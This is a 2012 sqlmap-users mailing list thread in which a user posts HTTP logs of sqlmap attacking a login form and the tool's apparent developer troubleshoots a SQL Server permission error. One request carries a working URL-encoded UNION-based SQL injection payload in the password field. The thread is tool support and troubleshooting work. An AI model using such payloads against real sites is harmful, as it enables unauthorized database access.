P.s. http://support.microsoft.com/kb/240872
This is a classic permission error. I am more than keen to see how Havij
does this. Waiting for your reply
Kind regards,
Miroslav Stampar
On Feb 22, 2012 7:38 AM, "Miroslav Stampar" <miroslav.stam...@gmail.com>
wrote:
> Hi.
>
> As there is no DBUSERNAME in the request I would say that the request is
> not the problem here. Now, I am interested how Havij manages it though.
>
> Is there a way for you to provide me privately with either: target url or
> untouched traffic file together with Burp log for Havij run against that
> target?
>
> Without more info I won't be able to help you more
>
> Kind regards,
> Miroslav Stampar
> On Feb 21, 2012 10:25 PM, "John Booth" <sqlmapiss...@hotmail.com> wrote:
>
>> DBUSERNAME = database user name
>>
>> DATABASENAME = name of the current database
>>
>>
>> let me know if this is not helpful or if you need the snippet of html
>> (which is just the hopepage)
>>
>>
>> HTTP request [#1]:
>>
>> POST /index.asp?action=auth HTTP/1.1
>>
>> Accept-Encoding: identity
>>
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>>
>> Host: site.com
>>
>> Accept-language: en-us,en;q=0.5
>>
>> Pragma: no-cache
>>
>> Cache-control: no-cache,no-store
>>
>> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>
>> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
>> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
>>
>> Connection: close
>>
>>
>> UN=admin&PW=admin&x=0&y=0
>>
>>
>> HTTP response [#1] (200 OK):
>>
>> Content-length: 7091
>>
>> X-powered-by: ASP.NET
>>
>> Set-cookie: sitecom=0; path=/,
>> ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/
>>
>> Age: 6
>>
>> Uri: http://site.com:80/index.asp?action=auth
>>
>> Server: Microsoft-IIS/6.0
>>
>> Connection: close
>>
>> Cache-control: private
>>
>> Date: Tue, 21 Feb 2012 21:15:23 GMT
>>
>> Content-type: text/html
>>
>>
>>
>> **
>>
>>
>> HTML OF HOMEPAGE - if relevant will add
>>
>>
>> **
>>
>>
>>
>> ############################################################################
>>
>>
>> HTTP request [#2]:
>>
>> POST /index.asp?action=auth HTTP/1.1
>>
>> Accept-Encoding: identity
>>
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>>
>> Host: site.com
>>
>> Accept-language: en-us,en;q=0.5
>>
>> Pragma: no-cache
>>
>> Cache-control: no-cache,no-store
>>
>> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>
>> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
>> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
>>
>> Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0
>>
>> Connection: close
>>
>>
>> UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2
>> 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN
>> NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2
>> 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0
>>
>>
>> HTTP response [#2] (500 Internal Server Error):
>>
>> Content-length: 480
>>
>> X-powered-by: ASP.NET
>>
>> Set-cookie: sitecom=0; path=/
>>
>> Age: 2
>>
>> Uri: http://www.site.com:80/index.asp?action=auth
>>
>> Server: Microsoft-IIS/6.0
>>
>> Connection: close
>>
>> Cache-control: private, no-store
>>
>> Date: Tue, 21 Feb 2012 21:15:28 GMT
>>
>> Content-type: text/html
>>
>>
>>
>> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
>>
>> <html>
>>
>> <head>
>>
>> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
>>
>>
>> <font face="Arial" size=2>
>>
>> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial"
>> size=2>error '80004005'</font>
>>
>> <p>
>>
>> <font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in
>> database 'DATABASENAME'.</font>
>>
>> <p>
>>
>> <font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>,
>> line 16</font>
>>
>>
>>
>> ############################################################################
>>
>>
>>
------------------------------------------------------------------------------
Virtualization & Cloud Management Using Capacity Planning
Cloud computing makes use of virtualization - but cloud computing
also focuses on allowing computing to be delivered as a service.
http://www.accelacomm.com/jaw/sfnl/114/51521223/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
